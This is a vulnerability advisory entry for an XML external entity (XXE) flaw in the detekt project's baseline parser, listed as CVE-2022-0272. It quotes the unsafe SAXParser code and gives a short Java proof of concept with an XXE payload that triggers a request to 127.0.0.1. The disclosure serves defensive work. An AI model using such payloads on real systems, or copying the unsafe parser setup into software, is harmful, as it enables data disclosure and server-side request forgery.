Lucene search
Ready-research23E37BA7-96D5-4037-A90A-8C8F4A70CE44HistoryJan 16, 2022 - 6:39 a.m.
in detekt/detekt
2022-01-1606:39:28
ready-research
www.huntr.dev
14
0.002 Low
EPSS
Percentile
57.2%
Description
The read() function makes use of SAXParser generated from a SAXParserFactory with no FEATURE_SECURE_PROCESSING set, allowing for XXE attacks. In https://github.com/detekt/detekt/blob/08eac68caa24ced140cc017d4de3b258a470232b/detekt-core/src/main/kotlin/io/gitlab/arturbosch/detekt/core/baseline/BaselineFormat.kt#L20-L22
val reader = SAXParserFactory.newInstance().newSAXParser()
val handler = BaselineHandler()
reader.parse(it, handler)
Proof of Concept
Extracted out the key function mentioned above to showcase how it can be exploited.
import javax.xml.parsers.SAXParser;
import javax.xml.parsers.SAXParserFactory;
import org.xml.sax.HandlerBase;
import java.io.ByteArrayInputStream;
public class Poc {
public static void main(String[] args) {
try {
String xmlpoc = "<?xml version=\"1.0\"?><!DOCTYPE foo [<!ENTITY xxe SYSTEM \"http://127.0.0.1/\">]><foo>&xxe;</foo>";
SAXParser saxParser = SAXParserFactory.newInstance().newSAXParser();
saxParser.parse(new ByteArrayInputStream(xmlpoc.getBytes()), new HandlerBase());
} catch (Exception e) {
e.printStackTrace();
}
}
}
Causes an SSRF to http://127.0.0.1
Impact
This vulnerability is capable of XXE to disclose data/conduct SSRF attacks etc.
Related
cve
cve
CVE-2022-0272
2022-04-21 17:15:07
cvelist
cvelist
github
github
XML External Entity Reference in detekt
2022-04-22 00:00:36
veracode
veracode
XML External Entity (XXE)
2022-04-27 04:20:34
osv
osv
CVE-2022-0272
2022-04-21 17:15:07
XML External Entity Reference in detekt
2022-04-22 00:00:36
nvd
nvd
CVE-2022-0272
2022-04-21 17:15:07
prion
prion
Xxe
2022-04-21 17:15:00